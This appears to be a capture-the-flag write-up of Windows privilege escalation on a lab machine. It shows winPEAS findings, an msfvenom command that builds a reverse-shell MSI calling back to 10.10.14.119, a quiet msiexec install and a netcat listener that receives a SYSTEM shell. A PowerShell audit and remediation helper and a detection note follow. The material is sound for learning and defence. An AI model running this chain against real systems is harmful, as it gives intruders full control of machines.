3 privesc

systeminfo

Host Name:                 LOVE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
System Type:               x64-based PC

PEAS

copy \\10.10.14.119\drive\win.exe
       1 file(s) copied.
   	
[+] Cached Creds
  [?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
   cachedlogonscount is 10
   
[+] UAC Status
  [?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
   ConsentPromptBehaviorAdmin: 0 - No prompting
   EnableLUA: 1
   LocalAccountTokenFilterPolicy: 1
   FilterAdministratorToken: 0
     [*] LocalAccountTokenFilterPolicy set to 1.
     [+] Any local account can be used for lateral movement.

[+] PowerShell Settings
   PowerShell v2 Version: 2.0
   PowerShell v5 Version: 5.1.19041.1
   PowerShell Core Version:
   Transcription Settings:
   Module Logging Settings:
   Scriptblock Logging Settings:
   PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
   PS history size: 51B

[+] Checking AlwaysInstallElevated
  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
   AlwaysInstallElevated set to 1 in HKLM!
   AlwaysInstallElevated set to 1 in HKCU!
   
[+] Enumerating NTLM Settings
LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default

Both hives report AlwaysInstallElevated = 1, so the MSI route from https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated applies: any MSI installed by this user runs with SYSTEM privileges.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.119 LPORT=7070 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi

copy \\10.10.14.119\drive\reverse.msi
        1 file(s) copied.

msiexec /quiet /i reverse.msi

$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.14.119] from (UNKNOWN) [10.129.105.29] 52606
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

whoami
nt authority\system
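The whole chain above hinges on one misconfiguration: AlwaysInstallElevated set to 1 in both HKLM and HKCU. The following PowerShell helper is an added audit check, not part of the original writeup or of winPEAS. It reads both registry values, reports whether the combination is exploitable (Windows Installer only elevates when both hives are set), and can optionally clear them. The function name and the -Remediate switch are my own.

```powershell
# Added audit helper, not part of the original writeup. Checks the two registry values
# that together enable the AlwaysInstallElevated path shown above, and can clear them.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param(
        # -Remediate sets both values to 0; writing HKLM requires an elevated session
        [switch]$Remediate
    )

    $paths = [ordered]@{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }

    $state = [ordered]@{}
    foreach ($hive in $paths.Keys) {
        $value = 0
        try {
            # A missing key or value means the policy is not configured, which is the secure default
            $item  = Get-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -ErrorAction Stop
            $value = [int]$item.AlwaysInstallElevated
        } catch {
            $value = 0
        }
        $state[$hive] = $value
    }

    # Windows Installer only runs a per-user install as SYSTEM when BOTH hives are set to 1;
    # either value alone is not enough, so that combination is the condition worth alerting on.
    $state['Exploitable'] = ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1)

    if ($Remediate) {
        foreach ($hive in $paths.Keys) {
            if ($state[$hive] -eq 1) {
                Set-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -Value 0 -Type DWord
                $state[$hive] = 0
            }
        }
        $state['Exploitable'] = $false
    }

    [pscustomobject]$state
}

# Report only; add -Remediate from an elevated prompt to clear both values.
Test-AlwaysInstallElevated
```

Run it from the same low-privilege session winPEAS ran in: on the box above it would print HKLM 1, HKCU 1, Exploitable True. For detection after the fact, Windows Installer writes MsiInstaller events to the Application log for every completed install, including the installing account and product name, so a quiet msiexec install from a user profile is visible there even when the registry values have since been cleared.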
